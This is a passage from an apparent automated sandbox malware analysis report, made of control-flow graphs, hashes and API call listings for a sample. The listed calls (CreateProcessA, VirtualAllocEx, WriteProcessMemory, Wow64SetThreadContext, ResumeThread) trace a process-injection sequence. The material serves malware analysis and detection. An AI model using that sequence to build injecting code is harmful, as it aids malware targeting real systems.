                                                control_flow_graph 3066 7c861a8-7c8623d 3068 7c8623f-7c86249 3066->3068 3069 7c86276-7c86296 3066->3069 3068->3069 3070 7c8624b-7c8624d 3068->3070 3074 7c86298-7c862a2 3069->3074 3075 7c862cf-7c862fe 3069->3075 3072 7c8624f-7c86259 3070->3072 3073 7c86270-7c86273 3070->3073 3076 7c8625b 3072->3076 3077 7c8625d-7c8626c 3072->3077 3073->3069 3074->3075 3079 7c862a4-7c862a6 3074->3079 3083 7c86300-7c8630a 3075->3083 3084 7c86337-7c863f1 CreateProcessA 3075->3084 3076->3077 3077->3077 3078 7c8626e 3077->3078 3078->3073 3080 7c862a8-7c862b2 3079->3080 3081 7c862c9-7c862cc 3079->3081 3085 7c862b4 3080->3085 3086 7c862b6-7c862c5 3080->3086 3081->3075 3083->3084 3087 7c8630c-7c8630e 3083->3087 3097 7c863fa-7c86480 3084->3097 3098 7c863f3-7c863f9 3084->3098 3085->3086 3086->3086 3088 7c862c7 3086->3088 3089 7c86310-7c8631a 3087->3089 3090 7c86331-7c86334 3087->3090 3088->3081 3092 7c8631c 3089->3092 3093 7c8631e-7c8632d 3089->3093 3090->3084 3092->3093 3093->3093 3094 7c8632f 3093->3094 3094->3090 3108 7c86490-7c86494 3097->3108 3109 7c86482-7c86486 3097->3109 3098->3097 3111 7c864a4-7c864a8 3108->3111 3112 7c86496-7c8649a 3108->3112 3109->3108 3110 7c86488 3109->3110 3110->3108 3114 7c864b8-7c864bc 3111->3114 3115 7c864aa-7c864ae 3111->3115 3112->3111 3113 7c8649c 3112->3113 3113->3111 3117 7c864ce-7c864d5 3114->3117 3118 7c864be-7c864c4 3114->3118 3115->3114 3116 7c864b0 3115->3116 3116->3114 3119 7c864ec 3117->3119 3120 7c864d7-7c864e6 3117->3120 3118->3117 3122 7c864ed 3119->3122 3120->3119 3122->3122
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07C863DE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738948164.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: a102873c528c8386cdc9244909eec239a251d3072444f8202ebb160eafa0ccbd
                                                • Instruction ID: 2e34e1736220a53b76e76e47edbade111b661ef67afa7a5f55038f3cb12684b5
                                                • Opcode Fuzzy Hash: a102873c528c8386cdc9244909eec239a251d3072444f8202ebb160eafa0ccbd
                                                • Instruction Fuzzy Hash: B9915BB1D0021ADFDF50DFA8C980B9DBBB2BF48314F1485A9E808B7251DB759A85CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 3123 2e9bcb8-2e9bcd7 3124 2e9bcd9-2e9bce6 call 2e9921c 3123->3124 3125 2e9bd03-2e9bd07 3123->3125 3132 2e9bce8 3124->3132 3133 2e9bcfc 3124->3133 3126 2e9bd09-2e9bd13 3125->3126 3127 2e9bd1b-2e9bd5c 3125->3127 3126->3127 3134 2e9bd69-2e9bd77 3127->3134 3135 2e9bd5e-2e9bd66 3127->3135 3180 2e9bcee call 2e9bf60 3132->3180 3181 2e9bcee call 2e9bf50 3132->3181 3133->3125 3136 2e9bd79-2e9bd7e 3134->3136 3137 2e9bd9b-2e9bd9d 3134->3137 3135->3134 3140 2e9bd89 3136->3140 3141 2e9bd80-2e9bd87 call 2e9b66c 3136->3141 3139 2e9bda0-2e9bda7 3137->3139 3138 2e9bcf4-2e9bcf6 3138->3133 3142 2e9be38-2e9bef8 3138->3142 3143 2e9bda9-2e9bdb1 3139->3143 3144 2e9bdb4-2e9bdbb 3139->3144 3146 2e9bd8b-2e9bd99 3140->3146 3141->3146 3173 2e9befa-2e9befd 3142->3173 3174 2e9bf00-2e9bf2b GetModuleHandleW 3142->3174 3143->3144 3147 2e9bdc8-2e9bdd1 call 2e9b67c 3144->3147 3148 2e9bdbd-2e9bdc5 3144->3148 3146->3139 3154 2e9bdde-2e9bde3 3147->3154 3155 2e9bdd3-2e9bddb 3147->3155 3148->3147 3156 2e9be01-2e9be05 3154->3156 3157 2e9bde5-2e9bdec 3154->3157 3155->3154 3178 2e9be08 call 2e9c260 3156->3178 3179 2e9be08 call 2e9c250 3156->3179 3157->3156 3159 2e9bdee-2e9bdfe call 2e9b68c call 2e9b69c 3157->3159 3159->3156 3160 2e9be0b-2e9be0e 3163 2e9be31-2e9be37 3160->3163 3164 2e9be10-2e9be2e 3160->3164 3164->3163 3173->3174 3175 2e9bf2d-2e9bf33 3174->3175 3176 2e9bf34-2e9bf48 3174->3176 3175->3176 3178->3160 3179->3160 3180->3138 3181->3138
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 02E9BF1E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1734402027.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2e90000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 2445f4d34d07452a98b1e64da606dfcc46cce8fc353f1c995d2e31fb724c0137
                                                • Instruction ID: 037563fd2e844942d0c531572b752399fe8de37fd91d59625de56bcb31d5aaf4
                                                • Opcode Fuzzy Hash: 2445f4d34d07452a98b1e64da606dfcc46cce8fc353f1c995d2e31fb724c0137
                                                • Instruction Fuzzy Hash: 928127B0A00B058FDB24DF29D44579ABBF5FF88308F00892ED48AD7A50D775E949CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 3182 55a2804-55a2876 3183 55a2878-55a287e 3182->3183 3184 55a2881-55a2888 3182->3184 3183->3184 3185 55a288a-55a2890 3184->3185 3186 55a2893-55a28cb 3184->3186 3185->3186 3187 55a28d3-55a2932 CreateWindowExW 3186->3187 3188 55a293b-55a2973 3187->3188 3189 55a2934-55a293a 3187->3189 3193 55a2980 3188->3193 3194 55a2975-55a2978 3188->3194 3189->3188 3195 55a2981 3193->3195 3194->3193 3195->3195
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 055A2922
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736936789.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_55a0000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 7041209716dfba346c3daaf0ea595dc6c1cc2cf123cb10af148c930de209e9e5
                                                • Instruction ID: f2bc0fb4b61e51d18ae2637cb27b079f492d8a8f7785247730454742c7b7ab1f
                                                • Opcode Fuzzy Hash: 7041209716dfba346c3daaf0ea595dc6c1cc2cf123cb10af148c930de209e9e5
                                                • Instruction Fuzzy Hash: B951DEB5D00309AFDB14CF99C985ADEBBF6BF48310F64852AE819AB214D7759881CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 055A2922
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736936789.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_55a0000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: f051d966828e41a95575e62e43ee5b25c0b9e37957954921d9c9e0ede73b3ca3
                                                • Instruction ID: cc1623b05534e08ec6ef23a6fe909be4d85b2e2e4e647f414e80f365819b7622
                                                • Opcode Fuzzy Hash: f051d966828e41a95575e62e43ee5b25c0b9e37957954921d9c9e0ede73b3ca3
                                                • Instruction Fuzzy Hash: 0F51DEB5D003499FDB14CF9AC984ADEBBF5BF48710F64852AE819AB210D771A881CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 055A4EA1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736936789.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_55a0000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID: CallProcWindow
                                                • String ID:
                                                • API String ID: 2714655100-0
                                                • Opcode ID: 6c2212e0c1fa153d46f5ddd9e7578e87915aa77aaa6780741363042e2bcb0f0b
                                                • Instruction ID: 825f9020fa1794e92f481f396a82f9891aeb8c7a434939abd2c5945dc663e391
                                                • Opcode Fuzzy Hash: 6c2212e0c1fa153d46f5ddd9e7578e87915aa77aaa6780741363042e2bcb0f0b
                                                • Instruction Fuzzy Hash: 284117B5A00205DFCB14CF99C488EAEBBF6FB88314F24C459E519AB321D775A841CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 02E95DC9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1734402027.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2e90000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: cfdce2b3ff37d2354d80e3fe342ea9560d316716d0e8ed4c76598622a0066c85
                                                • Instruction ID: 3a5840da34c4f3f5cae1ba96a050484458591d536890cc6d8f0c458da395de73
                                                • Opcode Fuzzy Hash: cfdce2b3ff37d2354d80e3fe342ea9560d316716d0e8ed4c76598622a0066c85
                                                • Instruction Fuzzy Hash: 4341DFB0C00619CBDB24CFA9C984B9EBBF5FF49304F64806AD408AB255DB756946CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 02E95DC9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1734402027.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2e90000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 908e444e32a398dec777336e1e385594a11dfdc19b89dbbd2c2acef45105db1f
                                                • Instruction ID: 241874a1c34c8eb2802c13e489468397d6d9ae47f5461681e264a1182de0610f
                                                • Opcode Fuzzy Hash: 908e444e32a398dec777336e1e385594a11dfdc19b89dbbd2c2acef45105db1f
                                                • Instruction Fuzzy Hash: 6041EEB0C00619CBDB24CFA9C984BDEBBF5FF49304F64816AD408AB255DB756986CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02E9BF99,00000800,00000000,00000000), ref: 02E9C1AA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1734402027.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2e90000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: c7c06ff4730a5b729ee5b9291795630f6a9c47f6a8b6c672236cd99c3d85e2fc
                                                • Instruction ID: 250b0dc8f6f84cc479d0d6af7718f1b84c037d624282a3f2475c377b3f2eb82a
                                                • Opcode Fuzzy Hash: c7c06ff4730a5b729ee5b9291795630f6a9c47f6a8b6c672236cd99c3d85e2fc
                                                • Instruction Fuzzy Hash: E3219AB28043498FDB10DFAAC884BDABFF4EB59314F14906ED458A7311C3749545CFA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07C85BB0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738948164.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 8f347c80435ed36358d8a4cecee38ca1aae1d8a4b85f4fafc9f6ce521064247e
                                                • Instruction ID: bf84c3c5b2fd7ed6494dc2c5edba72082c50342fed5487a58a102d0743cccb4c
                                                • Opcode Fuzzy Hash: 8f347c80435ed36358d8a4cecee38ca1aae1d8a4b85f4fafc9f6ce521064247e
                                                • Instruction Fuzzy Hash: D92137B19003199FCB10DFA9C980BEEBBF5FF48310F10882AE959A7350C7749955CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07C85BB0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738948164.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 1491da1882764e83f0920b73cf2889a3691850f40f10c08e2a6db0c4ed71bbf6
                                                • Instruction ID: 67197646bbb3d80d809f6b3ec8093597cc3e8d67c8feb58f58fc105646400143
                                                • Opcode Fuzzy Hash: 1491da1882764e83f0920b73cf2889a3691850f40f10c08e2a6db0c4ed71bbf6
                                                • Instruction Fuzzy Hash: 172125B19003599FCB10DFA9C885BEEBBF5FF48324F10842AE958A7350C7789954CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02E9E16E,?,?,?,?,?), ref: 02E9E22F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1734402027.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2e90000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: d2a56973de1abcd2e92fade6804ffdd12adecee504d46b3b648813c0c9df35ec
                                                • Instruction ID: abd4c742291408a87e516254d52ebc11c9c58431eef4a9de771d06e6fc2c323c
                                                • Opcode Fuzzy Hash: d2a56973de1abcd2e92fade6804ffdd12adecee504d46b3b648813c0c9df35ec
                                                • Instruction Fuzzy Hash: F021E6B59002489FDB10CF99D985ADEFBF8FB48324F14801AE958A3350D774A944CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02E9E16E,?,?,?,?,?), ref: 02E9E22F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1734402027.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2e90000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 76343e8cdf108d82923ca1e1b4228aa844db7166b19c32a49bcbf3a675388be5
                                                • Instruction ID: dc4779cfa38efaf185ec442cec1e0c3361800f756dd9ee4549aa66418101867b
                                                • Opcode Fuzzy Hash: 76343e8cdf108d82923ca1e1b4228aa844db7166b19c32a49bcbf3a675388be5
                                                • Instruction Fuzzy Hash: 8A21E4B5900258EFDB10CF9AD984AEEFBF4FB48310F14841AE958A7350D375A944CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07C85C90
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738948164.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 0b17a0bcfc0f47d35b9611dd8bafc279038ecd82afe1ed4e120f68b1043dbd5d
                                                • Instruction ID: d0bba98698e78056159e568fba949d845ffb7e3f5a114b70b0ee6fc62341aeef
                                                • Opcode Fuzzy Hash: 0b17a0bcfc0f47d35b9611dd8bafc279038ecd82afe1ed4e120f68b1043dbd5d
                                                • Instruction Fuzzy Hash: B92105B1900259DFCB10DFA9D980AEEBBF5FF48320F10842AE559A7250C7789955CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07C855CE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738948164.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 208d03bf1828704dfa7f270aec8288c08e9e0c50fae958bf0c93037fc8405f39
                                                • Instruction ID: d608b106735e07bc8553ed3c7960c346e068953b1691ea69590528ccaf50dc79
                                                • Opcode Fuzzy Hash: 208d03bf1828704dfa7f270aec8288c08e9e0c50fae958bf0c93037fc8405f39
                                                • Instruction Fuzzy Hash: DD2118B1900209CFDB10DFA9C5857EEBBF5AF88324F14842AD459A7250DB789945CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07C855CE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738948164.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 9aaaa095e6ac884be52e67efe1b9ee81b8769281373d386c1e92a4d7e31fe0d8
                                                • Instruction ID: 381805e5f0589774c07a522c5d8720c01a45e3791cb00e6650537b921274571a
                                                • Opcode Fuzzy Hash: 9aaaa095e6ac884be52e67efe1b9ee81b8769281373d386c1e92a4d7e31fe0d8
                                                • Instruction Fuzzy Hash: 8A2149B19003098FDB10DFAAC4857EEBBF5EF48324F14842AD459A7250DB789945CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07C85C90
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738948164.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 4215050d44bac78be3c03e5cb33f89a7f87b582418c2c941651eaa9c6d5dfb0d
                                                • Instruction ID: 9aca8053b09265708b5523486a1c9590c42c8038ed1e960079f37e9b34be3516
                                                • Opcode Fuzzy Hash: 4215050d44bac78be3c03e5cb33f89a7f87b582418c2c941651eaa9c6d5dfb0d
                                                • Instruction Fuzzy Hash: 762116B18002599FCB10DFAAC980AEEFBF5FF48320F10842AE559A7250C7749954CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02E9BF99,00000800,00000000,00000000), ref: 02E9C1AA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1734402027.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2e90000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 64f98ff9c30e5d97ee29f3fdb90f6ed49f5a64a2b6880f5d884da317ccb4c8c5
                                                • Instruction ID: e50eec52500aa0c4f5d761d22e63ff917edb301011392594102e8bd2955e5d55
                                                • Opcode Fuzzy Hash: 64f98ff9c30e5d97ee29f3fdb90f6ed49f5a64a2b6880f5d884da317ccb4c8c5
                                                • Instruction Fuzzy Hash: 7E1114B69002099FDB10DF9AC944ADEFBF4EB48314F14842AE419A7210C375A545CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02E9BF99,00000800,00000000,00000000), ref: 02E9C1AA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1734402027.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2e90000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 5931c69d6cc083919e0a5f4b5f7f0b635b9ae67cf133ee23574ceb1f6de42892
                                                • Instruction ID: 0dccf34d9fc4b6a7d1477c3f4e094972651116f19147520a75d811ffbdd61085
                                                • Opcode Fuzzy Hash: 5931c69d6cc083919e0a5f4b5f7f0b635b9ae67cf133ee23574ceb1f6de42892
                                                • Instruction Fuzzy Hash: 2F1126B6D003499FDB10DF9AD844ADEFBF4EB48314F10942AE519A7310C775A945CFA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07C85ACE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738948164.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 820fc37b23f73010c544cda9c501e88f10d23bac61833734d431cab18de63903
                                                • Instruction ID: ebf607731d5ea949ecfcb88c0144b9719fef0db52cd8330e1c224973c573b19b
                                                • Opcode Fuzzy Hash: 820fc37b23f73010c544cda9c501e88f10d23bac61833734d431cab18de63903
                                                • Instruction Fuzzy Hash: 03118CB1900249CFCF10DFA9C8446EEBBF5FF48320F108419E519A7220C7759954CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07C85ACE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738948164.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 2fa7aa13c0c9cda1f0cc4471e5620d9a56b00451110fa76f9f6a8a17214327fa
                                                • Instruction ID: 93e5a0943cfa4a2d6007031ff16c67a41d460f603538372e4681220e7d3d6f5d
                                                • Opcode Fuzzy Hash: 2fa7aa13c0c9cda1f0cc4471e5620d9a56b00451110fa76f9f6a8a17214327fa
                                                • Instruction Fuzzy Hash: 9A113AB19002499FCB10DFA9C844BEFBFF5EF48324F248419D555A7250C7759954CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738948164.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 25bed186fd3c13711812a6e7f10cb974a5fc63a164a50c9b33d26a0f901ed5f5
                                                • Instruction ID: 21bf1e00c97c25385cadfff03a15d4e5c2faa7c36b86aa440af67c851854f02f
                                                • Opcode Fuzzy Hash: 25bed186fd3c13711812a6e7f10cb974a5fc63a164a50c9b33d26a0f901ed5f5
                                                • Instruction Fuzzy Hash: B4116AB1D00349CFCB20DFA9C5447EEFBF5AB88324F24882AD059A7250CB75A944CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738948164.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 927c0f34231664f41e6e24a33a55d97e55f767543baf735dad649f91f60cb647
                                                • Instruction ID: 26bc48af1582dc694acf5510bd31f4039fa60baabf3ae8c015e8df312eaf9cc9
                                                • Opcode Fuzzy Hash: 927c0f34231664f41e6e24a33a55d97e55f767543baf735dad649f91f60cb647
                                                • Instruction Fuzzy Hash: 04113AB19003498FCB20DFAAC4457DEFBF5EB88324F248819D559A7250CB75A944CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 02E9BF1E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1734402027.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2e90000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: ee321f524574ff067044e484eca684bd558aa972921d25712cc5f348ed0bab37
                                                • Instruction ID: b34956a03b2bf649a3927a41b9eb2a31c2a01acea59c78b94e01293b12837028
                                                • Opcode Fuzzy Hash: ee321f524574ff067044e484eca684bd558aa972921d25712cc5f348ed0bab37
                                                • Instruction Fuzzy Hash: 3611E0B6D002498FCB10CF9AD944BDEFBF4AB88728F14C46AD869A7210C375A545CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 07C8980D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738948164.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 06786024e76dbf8bd3224ccc1129e8cb8b013531bf9934d0f01776c5d8e41fdb
                                                • Instruction ID: ebbd3dc3f34386908dd438ec6cf555acd1c3a5099261f0368f31d8625914e2a5
                                                • Opcode Fuzzy Hash: 06786024e76dbf8bd3224ccc1129e8cb8b013531bf9934d0f01776c5d8e41fdb
                                                • Instruction Fuzzy Hash: A511F2B5800349DFCB10DF9AC884BEEBBF8EB48324F10841AE958A7210C375A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 07C8980D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738948164.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 0510c43db8c6037a5f194f77e8274be42f6f5403c6d9f862d2a31b0a4ef6a937
                                                • Instruction ID: f23175cb8dfad8d575aaa3ec7972f636dfb44a7f2be0dcada32c6813609db350
